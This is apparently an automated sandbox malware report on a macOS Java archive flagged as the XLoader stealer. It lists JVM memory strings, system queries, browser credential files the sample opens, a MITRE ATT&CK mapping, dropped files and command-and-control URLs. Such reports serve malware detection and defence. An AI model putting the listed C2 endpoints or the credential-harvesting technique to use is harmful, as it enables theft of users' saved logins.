Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_throw_klass_external_name_exception
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciJavaClasses.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZZN13JVMCICompiler25exit_on_pending_exceptionEP7oopDescPKcE12report_error
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv22get_klass_by_name_implEP5KlassRK18constantPoolHandleP6Symbolb
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime35throw_klass_external_name_exceptionEP10JavaThreadPKcP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::by_full_signature
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __Z22jvmci_counters_includeP10JavaThread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv13lookup_methodEP13InstanceKlassP5KlassP6SymbolS5_N9Bytecodes4CodeE11constantTag
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs32localHotSpotVMIntConstants_countEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv::ok
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN16JVMCIJavaClasses15compute_offsetsEP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN7nmethod18do_unloading_jvmciEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZTV13JVMCICompiler
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI is not enabled
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime20can_initialize_JVMCIEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv18get_field_by_indexEP13InstanceKlassR15fieldDescriptori
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN19HotSpotJVMCIRuntime26compilationLevelAdjustmentEP8_jobject
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv19get_method_by_indexERK18constantPoolHandleiN9Bytecodes4CodeEP13InstanceKlass
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompilerC2Ev
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime18write_barrier_postEP10JavaThreadPv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext5checkEP7oopDescPKci
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCITrace-2:
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN7nmethod20jvmci_installed_codeEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv23get_klass_by_index_implERK18constantPoolHandleiRbP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompilerToVMInit.cpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_vm_error
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime21thread_is_interruptedEP10JavaThreadP7oopDesch
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::by_holder
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZL19JVMCIUseFastLocking
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: ()Ljdk/vm/ci/runtime/JVMCICompiler;
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::load_and_clear_exception
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI Compiler disabled due to -Xint.
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jdk/vm/ci/common/JVMCIError
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime22_comp_level_adjustmentE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler24print_compilation_timersEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN19HotSpotJVMCIRuntime30set_compilationLevelAdjustmentEP8_jobjecti
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: HotSpotJVMCIRuntime initialization should only be triggered through JVMCI initialization
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler25exit_on_pending_exceptionEP7oopDescPKc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: <internal JVMCI error>
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_log_object
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: java/lang/VirtualMachineError
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: Bootstrapping JVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs27localHotSpotVMStructs_countEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::write_barrier_post
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext13metadataRootsEP8_jobject
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext21_metadataRoots_offsetE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompiler.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN5ciEnv26_VirtualMachineError_klassE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCodeInstaller.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime15validate_objectEP10JavaThreadP7oopDescS3_
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnvC1EP11CompileTaski
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN17AOTCompiledMethod18do_unloading_jvmciEv
Source: java, 00000555.00000246.9.0000000106fb8000.0000000106fed000.rw-.sdmp	Binary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/.
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler10initializeEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs25localHotSpotVMTypes_countEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_dynamic_new_instance
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIPrintProperties
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _jvmciHotSpotVMLongConstants
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_throw_and_post_jvmti_exception
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime30throw_and_post_jvmti_exceptionEP10JavaThreadPKcS3_
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::vm_error
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::throw_class_cast_exception
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime8vm_errorEP10JavaThreadlll
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: Java_jdk_vm_ci_runtime_JVMCI_initializeRuntime
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv::code_too_large
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime15new_multi_arrayEP10JavaThreadP5KlassiPi
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI Compiler CodeBuffer
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN22HotSpotCompiledNmethod8jvmciEnvE6Handle
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::object_notify
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: BootstrapJVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime31_well_known_classes_initializedE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCITrace-4:
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _jvmci_counters
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCIThreads
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _jvmci_ir_size
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime11metadata_doEPFvP8MetadataE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCITrace-3:
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jvmciEnv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::thread_is_interrupted
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::monitorenter
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::dynamic_new_array
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCICompiler::print_timers
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_monitorexit
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime20force_initializationEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::exception_handler_for_pc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/cpu/x86/jvmciCodeInstaller_x86.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCINMethodSizeLimit
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::new_multi_array
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler12print_timersEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciEnv.cpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI code install time: %6.3f s
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime29initialize_well_known_classesEP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime18bootstrap_finishedEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_vm_message
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::object_notifyAll
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_throw_class_cast_exception
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN19HotSpotJVMCIRuntime5checkEP7oopDescPKci
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime10callStaticEPKcS1_S1_P17JavaCallArgumentsP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs23localHotSpotVMAddressesE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jdk/vm/ci/hotspot/HotSpotJVMCIMetaAccessContext
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVM_RegisterJVMCINatives
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _BootstrapJVMCI
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: # Can't open file to dump replay data. Error: # -XX:OnError="# Executing /bin/sh -c " ...os::fork_and_exec failed: %s (%s=%d)# java.lang.OutOfMemoryError: %s# -XX:OnOutOfMemoryError="%s""%s"...# Possible reasons:# The system is out of physical RAM or swap space# The process is running with CompressedOops enabled, and the Java Heap may be blocking the growth of the native heap# Possible solutions:# Reduce memory load on the system# Increase physical memory or swap space# Check if swap backing store is full# Decrease Java heap size (-Xmx/-Xms)# Decrease number of Java threads# Decrease Java thread stack sizes (-Xss)# Set larger code cache with -XX:ReservedCodeCacheSize=# JVM is running with Unscaled Compressed Oops mode in which the Java heap is# placed in the first 4GB address space. The Java Heap base address is the# maximum limit for the native heap growth. Please use -XX:HeapBaseMinAddress# to set the Java Heap base and to place the Java Heap above 4GB virtual address.# JVM is running with Zero Based Compressed Oops mode in which the Java heap is# placed in the first 32GB address space. The Java Heap base address is the# to set the Java Heap base and to place the Java Heap above 32GB virtual address.# This output file may be truncated or incomplete.# JRE version: %s (%s) (%sbuild %s)# Java VM: %s (%s%s, %s%s%s%s%s, %s, %s), tiered, jvmci, jvmci compiler, compressed oops# If you would like to submit a bug report, please visit:# # The crash happened outside the Java Virtual Machine in native code.
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime32_HotSpotJVMCIRuntime_initializedE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime13object_notifyEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI compile queue
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv24get_method_by_index_implERK18constantPoolHandleiN9Bytecodes4CodeEP13InstanceKlass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIThreads
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIGlobals32check_jvmci_flags_are_consistentEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs29localHotSpotVMAddresses_countEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime16_shutdown_calledE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime17dynamic_new_arrayEP10JavaThreadP7oopDesci
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv17get_klass_by_nameEP5KlassP6Symbolb
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _EagerJVMCI
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::identity_hash_code
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: , jvmci
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jdk/vm/ci/hotspot/HotSpotJVMCIRuntime
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompilerC1Ev
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: EnableJVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN16JVMCIKlassHandleaSEP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCITraceLevel
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_log_primitive
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::log_printf
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::log_primitive
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime17write_barrier_preEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: Improperly specified VM option UseJVMCICompiler: EnableJVMCI cannot be disabled
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext11allContextsEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: ()Ljdk/vm/ci/hotspot/HotSpotJVMCIRuntime;
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime24exception_handler_for_pcEP10JavaThread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCICountersExcludeCompiler

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)

Sysctl read request: kern.safeboot (1.66)

Jump to behavior

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Sysctl read request: hw.ncpu (6.3)			Jump to behavior
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Sysctl read request: hw.memsize (6.24)			Jump to behavior

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Sysctl requested: kern.ostype (1.1)			Jump to behavior
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Sysctl requested: kern.osrelease (1.2)			Jump to behavior

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Sysctl requested: kern.hostname (1.10)			Jump to behavior
Source: /bin/sh (PID: 557)	Sysctl requested: kern.hostname (1.10)			Jump to behavior

Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /usr/bin/java (PID: 555)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior

Stealing of Sensitive Information:

Yara detected XLoader

Show sources

Source: Yara match	File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match	File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

Accesses directories and/or files with sensitive browser data likely for credential stealing

Show sources

Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557)	Sensitive file/directory: /Users/berri/Library/Application Support/Google/Chrome/Default/Login Data	Jump to behavior
Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557)	Sensitive file/directory: /Users/berri/Library/Application Support/Firefox/Profiles	Jump to behavior
Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557)	Sensitive file/directory: /Users/berri/Library/Application Support/Firefox/Profiles	Jump to behavior

Remote Access Functionality:

Yara detected XLoader

Show sources

Source: Yara match	File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match	File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	LC_LOAD_DYLIB Addition1	LC_LOAD_DYLIB Addition1	Disable or Modify Tools1	Credentials from Web Browsers1	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Launch Agent2	Launch Agent2	Process Injection1	LSASS Memory	System Information Discovery51	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Launch Daemon1	Process Injection1	Scripting1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Plist Modification1	Launch Daemon1	Hidden Files and Directories21	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Plist Modification1	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Statement SKBMT 09818.jar	35%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH	0%	ReversingLabs
/Users/berri/kIbwf02l	0%	ReversingLabs

Domains

Source	Detection	Scanner	Label	Link
lidokeyhomes.info	0%	Virustotal		Browse
drlindaydevenish.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.dutythrow.com/09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM	0%	Avira URL Cloud	safe
http://www.iregentos.info/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg=	0%	Avira URL Cloud	safe
http://www.drlindaydevenish.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ=	0%	Avira URL Cloud	safe
http://www.decoratudo.com/09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM	0%	Avira URL Cloud	safe
http://www.zincfacemask.com/09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM	0%	Avira URL Cloud	safe
http://www.lidokeyhomes.info/09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM	0%	Avira URL Cloud	safe
http://www.hypesoleco.com/09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM	0%	Avira URL Cloud	safe
http://www.rshuahui.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI=	0%	Avira URL Cloud	safe
http://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
